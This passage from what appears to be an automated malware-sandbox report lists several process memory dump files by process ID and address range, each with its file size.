                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-254-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4624-255-0x00007FF7F1340000-0x00007FF7F1460000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        1.1MB

                                                                                                                                                                      • memory/4900-77-0x0000000001010000-0x000000000105C000-memory.dmp
                                                                                                                                                                        Filesize

                                                                                                                                                                        304KB